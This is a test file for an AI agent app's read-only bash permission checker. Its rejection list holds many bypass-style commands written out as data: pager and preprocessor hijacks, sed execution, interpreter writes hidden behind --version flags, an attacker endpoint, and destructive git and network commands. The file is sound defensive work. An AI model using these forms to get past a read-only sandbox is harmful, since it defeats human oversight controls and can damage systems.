import { describe, expect, it } from 'bun:test';
import { readFileSync } from 'node:fs';
import { join } from 'node:path';
import { isReadOnlyBashCommandWithConfig } from '../mode-manager.ts';
import type { MergedPermissionsConfig, PatternWithComment } from '../permissions-config.ts';

const bundled = JSON.parse(readFileSync(join(
  import.meta.dir,
  '../../../../../apps/electron/resources/permissions/default.json',
), 'utf8')) as { allowedBashPatterns: PatternWithComment[] };

const config: MergedPermissionsConfig = {
  blockedTools: new Set(),
  readOnlyBashPatterns: bundled.allowedBashPatterns.map(entry => ({
    regex: new RegExp(entry.pattern),
    source: entry.pattern,
    comment: entry.comment,
  })),
  blockedCommandHints: [],
  readOnlyMcpPatterns: [],
  allowedApiEndpoints: [],
  allowedWritePaths: [],
  displayName: 'test',
  shortcutHint: '',
};

const SAFE_GIT = 'git --no-optional-locks -c core.fsmonitor=false -c core.hooksPath=/dev/null -c log.showSignature=false -c format.pretty=medium --no-pager';

describe('bundled read-only command defaults', () => {
  it.each([
    'tree -o /tmp/pwn .',
    'tree -o/tmp/pwn .',
    'tree --output=/tmp/pwn .',
    'file -C -m /tmp/magic',
    'less -o /tmp/pwn README.md',
    'more README.md',
    'bat --pager=/tmp/evil README.md',
    'markitdown report.docx',
    'markitdown -o /tmp/pwn report.docx',
    'markitdown --use-plugins report.docx',
    'markitdown --use-docintel report.docx',
    'markitdown --endpoint https://attacker.invalid report.docx',
    'pdf-tool extract report.pdf -o /tmp/pwn',
    'pdf-tool info report.pdf --output=/tmp/pwn',
    'pdf-tool info report.pdf --set --title changed',
    'xlsx-tool read book.xlsx --output /tmp/pwn',
    'xlsx-tool info book.xlsx -o/tmp/pwn',
    'xlsx-tool export book.xlsx -o /tmp/pwn',
    'doc-diff before.docx after.docx --output=/tmp/pwn',
    'doc-diff before.docx after.docx -o/tmp/pwn',
    'img-tool info image.png --output /tmp/pwn',
    'docx-tool info report.docx -o /tmp/pwn',
    'docx-tool extract report.docx --output=/tmp/pwn',
    'pptx-tool info deck.pptx -o/tmp/pwn',
    'pptx-tool extract deck.pptx --output /tmp/pwn',
    'ical-tool read calendar.ics -o /tmp/pwn',
    'ical-tool filter calendar.ics --start 2026-01-01 --end 2026-12-31 --output=/tmp/pwn',
    'rg --pre=/tmp/evil needle .',
    'rg --pre /tmp/evil needle .',
    'rg --hostname-bin=/tmp/evil needle .',
    'rg --hostname-bin /tmp/evil needle .',
    'ag --pager=/tmp/evil needle .',
    'ack --pager=/tmp/evil needle .',
    'fd -x touch /tmp/pwn',
    'fd -X touch /tmp/pwn',
    'fd --exec=touch /tmp/pwn',
    'fzf --preview=/tmp/evil',
    'git branch -D victim',
    'git -C repo tag -d v1',
    'git remote remove origin',
    'git reflog delete HEAD@{0}',
    'git diff --output=/tmp/pwn',
    'git show --ext-diff HEAD',
    'git ls-remote --upload-pack=/tmp/evil origin',
    'git status --short',
    'git -C repo --no-pager log -n 3',
    'git diff --stat',
    'git branch --show-current',
    'git tag --list release-*',
    'git remote -v',
    'git remote show origin',
    'git remote get-url origin',
    'git reflog show -n 5',
    'git config --get remote.origin.url',
    'git ls-remote --heads origin',
    `${SAFE_GIT} status --short`,
    `${SAFE_GIT} diff --stat`,
    `${SAFE_GIT} show HEAD`,
    `${SAFE_GIT} log -p -n 1`,
    `${SAFE_GIT} grep -f /tmp/patterns`,
    `${SAFE_GIT} grep --file=/tmp/patterns needle`,
    `${SAFE_GIT} ls-files --exclude-from=/tmp/excludes`,
    '/tmp/git --no-optional-locks -c core.fsmonitor=false -c core.hooksPath=/dev/null -c log.showSignature=false -c format.pretty=medium --no-pager rev-parse HEAD',
    './git --no-optional-locks -c core.fsmonitor=false -c core.hooksPath=/dev/null -c log.showSignature=false -c format.pretty=medium --no-pager rev-parse HEAD',
    'Git --no-optional-locks -c core.fsmonitor=false -c core.hooksPath=/dev/null --no-pager rev-parse HEAD',
    'gh api graphql -f query=mutation',
    'gh api graphql -F query=mutation',
    'gh api repos/o/r/issues --field title=pwn',
    'gh api repos/o/r/issues --raw-field title=pwn',
    'gh api repos/o/r/issues --input payload.json',
    'gh api /user -X POST',
    'gh api /user -XPOST',
    'gh api /user --method=DELETE',
    'gh api /user --method GET --method DELETE',
    'gh api /user --method GET -f visibility=private',
    'npm audit fix',
    'npm audit --fix',
    'pnpm audit --fix',
    'hostname new-host',
    'date 010100002030',
    'date --set=2030-01-01',
    'htop',
    'kubectl cluster-info dump --output-directory=/tmp/pwn',
    'kubectl cluster-info dump --output-directory /tmp/pwn',
    'kubectl get pods --kubeconfig=./untrusted.yaml',
    'kubectl get pods --kubeconfig ./untrusted.yaml',
    'sort -o /tmp/pwn input',
    'sort --output=/tmp/pwn input',
    'sort --compress-program=/tmp/evil input',
    'sort -T /tmp input',
    'docker compose config -o /tmp/pwn',
    'docker-compose config --output=/tmp/pwn',
    "sed -n '1,10p' README.md",
    "sed -n 'w /tmp/pwn' README.md",
    "sed -n '1w /tmp/pwn' README.md",
    "sed -n 'e touch /tmp/pwn' README.md",
    "sed -n -e 'w /tmp/pwn' README.md",
    "awk 'BEGIN { print \"x\" > \"/tmp/pwn\" }'",
    "gawk '{ print $1 }' README.md",
    "yq -i '.enabled = true' config.yml",
    "yq --inplace '.enabled = true' config.yml",
    "yq --split-exp '.name' config.yml",
    "yq --split-exp-file expression.txt config.yml",
    "yq -s '.name' config.yml",
    "xq --in-place '.root' document.xml",
    "xq --inplace '.root' document.xml",
    "xq --split-exp '.name' document.xml",
    'xmllint --output /tmp/pwn document.xml',
    'xmllint --shell document.xml',
    'python -m json.tool input.json /tmp/pwn',
    'ip link set dev eth0 down',
    'ip addr add 192.0.2.1/24 dev eth0',
    'ip route delete default',
    'ifconfig eth0 down',
    'ifconfig eth0 192.0.2.1',
    'uniq input /tmp/pwn',
    "node --version -e 'require(\"fs\").writeFileSync(\"/tmp/pwn\", \"x\")'",
    'npm --version install',
    'python --version -c \'open("/tmp/pwn", "w").write("x")\'',
    'python3 -V -c \'open("/tmp/pwn", "w").write("x")\'',
    "ruby -v -e 'File.write(\"/tmp/pwn\", \"x\")'",
    "php -v -r 'file_put_contents(\"/tmp/pwn\", \"x\");'",
    "perl -v -e 'open(F, \">/tmp/pwn\")'",
    "bash -c 'touch /tmp/pwn' --help",
    "bash -c 'touch /tmp/pwn' -h",
    'unknown-tool --help',
    'man -P /tmp/evil printf',
  ])('rejects a write-capable read-lookalike: %s', command => {
    expect(isReadOnlyBashCommandWithConfig(command, config)).toBe(false);
  });

  it.each([
    'tree -L 2 .',
    'file -m /tmp/magic README.md',
    'pdf-tool extract report.pdf --pages 1-3',
    'pdf-tool info report.pdf',
    'xlsx-tool read book.xlsx --sheet Summary',
    'xlsx-tool info book.xlsx',
    'xlsx-tool export book.xlsx --format json',
    'doc-diff before.docx after.docx --format summary',
    'img-tool info image.png',
    'docx-tool info report.docx',
    'docx-tool extract report.docx --no-tables',
    'pptx-tool info deck.pptx',
    'pptx-tool extract deck.pptx --slide 2',
    'ical-tool read calendar.ics --format json',
    'ical-tool filter calendar.ics --start 2026-01-01 --end 2026-12-31',
    'rg needle .',
    'fd needle .',
    `${SAFE_GIT} -C repo log -n 3`,
    `${SAFE_GIT} branch --show-current`,
    `${SAFE_GIT} rev-parse HEAD`,
    `${SAFE_GIT} merge-base HEAD main`,
    `${SAFE_GIT} ls-files --cached`,
    `${SAFE_GIT} grep -n needle -- src`,
    'gh api repos/o/r',
    'gh api /user -X GET',
    'gh api /user -XGET',
    'gh api /user --method=GET',
    'npm audit --json',
    'pnpm audit --json',
    'hostname',
    'hostname -f',
    'date',
    'date -u +%Y-%m-%d',
    'kubectl cluster-info dump',
    'kubectl get pods --all-namespaces',
    'sort',
    'sort -u',
    'find . -maxdepth 2 -type f | sort',
    'docker compose config',
    'docker-compose config --services',
    "yq '.name' config.yml",
    "xq '.root' document.xml",
    'xmllint --format document.xml',
    'python -m json.tool --sort-keys input.json',
    'ip link show dev eth0',
    'ip -brief addr show',
    'ifconfig',
    'ifconfig en0',
    'printf "a\\na\\n" | uniq -c',
    'node --version',
    'npm -v',
    'yarn --version',
    'pnpm -v',
    'bun --version',
    'python --version',
    'python3 -V',
    'ruby -v',
    'go version',
    'rustc --version',
    'cargo -V',
    'java -version',
    'dotnet --version',
    'php -v',
    'perl --version',
  ])('retains the bounded stdout-only form: %s', command => {
    expect(isReadOnlyBashCommandWithConfig(command, config)).toBe(true);
  });
});
